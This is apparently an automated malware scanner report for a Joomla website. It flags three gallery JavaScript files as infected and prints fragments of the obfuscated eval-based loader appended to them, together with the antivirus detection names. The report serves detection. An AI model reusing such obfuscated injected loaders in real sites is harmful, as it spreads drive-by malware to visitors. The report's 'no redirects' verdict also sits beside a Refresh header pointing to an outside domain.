New scan:

Malware Scanner report for griffel24.ru

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://griffel24.ru/
200 OK
Content-Length: 22171
Content-Type: text/html
clean
http://griffel24.ru/index.php?option=com_content&view=article&id=3&Itemid=4
200 OK
Content-Length: 37463
Content-Type: text/html
clean
http://griffel24.ru/index.php?option=com_content&view=article&id=4&Itemid=6
200 OK
Content-Length: 33401
Content-Type: text/html
clean
http://griffel24.ru/index.php?option=com_content&view=article&id=34&Itemid=13
200 OK
Content-Length: 18846
Content-Type: text/html
clean
http://griffel24.ru/index.php?option=com_content&view=article&id=5&Itemid=7
200 OK
Content-Length: 22182
Content-Type: text/html
clean
http://griffel24.ru/index.php?option=com_content&view=article&id=1&Itemid=9
200 OK
Content-Length: 11124
Content-Type: text/html
clean
http://griffel24.ru/index.php?view=article&catid=1%3A2011-11-25-15-49-02&id=1%3A2011-11-25-15-50-30&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=9
200 OK
Content-Length: 5926
Content-Type: text/html
clean
http://griffel24.ru/media/system/js/caption.js
404 Not Found
Content-Length: 289
Content-Type: text/html
clean
http://griffel24.ru/test404page.js
404 Not Found
Content-Length: 277
Content-Type: text/html
clean
http://griffel24.ru/media/system/js/modal.js
404 Not Found
Content-Length: 287
Content-Type: text/html
clean
http://griffel24.ru/components/com_imageshow/assets/js/swfobject.js
200 OK
Content-Length: 19972
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=
... 3120 bytes are skipped ...
](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO)));

Antivirus reports:

Ikarus
Trojan.Script
Comodo
TrojWare.JS.Agent.TC
F-Prot
JS/IFrame.SJ.gen
Commtouch
JS/IFrame.SJ.gen

http://griffel24.ru/components/com_imageshow/assets/js/jsn_is_extultils.js
200 OK
Content-Length: 12772
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JSNISExtUtils = {
addEvent: function(target, event, func){
if (target.addEventListener){
target.addEventListener(event, func, false);
return true;
} else if (target.attachEvent){
var result = target.attachEvent("on"+event, func);
return result;
} else {
return false;
}
},

checkSubstring: function(targetString, targetSubstring, delimeter, wholeWord){
if(wholeWord == undefined) wholeWord = false;
var p
... 3374 bytes are skipped ...
](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO)));

Antivirus reports:

Ikarus
Trojan.Script
Comodo
TrojWare.JS.Agent.TC
DrWeb
JS.Redirector.188
F-Prot
JS/IFrame.SJ.gen
Norman
Crypt.BJLS
Commtouch
JS/IFrame.SJ.gen

http://griffel24.ru/components/com_imageshow/assets/js/jsn_is_imageshow.js
200 OK
Content-Length: 13453
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JSNISImageShow = {
alternativeContent:function()
{
var objSWF = swfobject.getFlashPlayerVersion();
var version = objSWF.major;

if(version == 0)
{
var elementFlashObj = JSNISExtUtils.getElementsByClass(document, 'div', 'jsnis-gallery');
for(var i = 0; i < elementFlashObj.length; i++)
{
JSNISExtUtils.addClass(elementFlashObj[i], 'jsnis-gallery no-swfobj-flash');
}

var elementAlternative = JSNISExtU
... 3327 bytes are skipped ...
](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO)));

Antivirus reports:

Ikarus
Trojan.Script
K7AntiVirus
Riskware
Comodo
TrojWare.JS.Agent.TC
DrWeb
JS.Redirector.188
F-Prot
JS/IFrame.SJ.gen
Norman
Crypt.BJLS
Commtouch
JS/IFrame.SJ.gen

http://griffel24.ru/index.php?option=com_content&view=article&id=1&Itemid=9&change_font=increase
200 OK
Content-Length: 11124
Content-Type: text/html
clean
http://griffel24.ru/index.php?option=com_content&view=article&id=1&Itemid=9&change_font=decrease
200 OK
Content-Length: 11124
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: griffel24.ru

Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sun, 28 Sep 2014 15:06:26 GMT
Pragma: no-cache
Server: nginx/1.5.7
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 28 Sep 2014 15:06:26 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Refresh: 25; url="http://www.bluehost-dz.com/done"
Set-Cookie: 9f2a90db67579e577a6d7e4220b9d293=43497634df7f14bdc694805594b4fbb6; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: griffel24.ru
Referer: http://www.google.com/search?q=griffel24.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=griffel24.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://griffel24.ru/

Result: griffel24.ru is not infected or malware details are not published yet.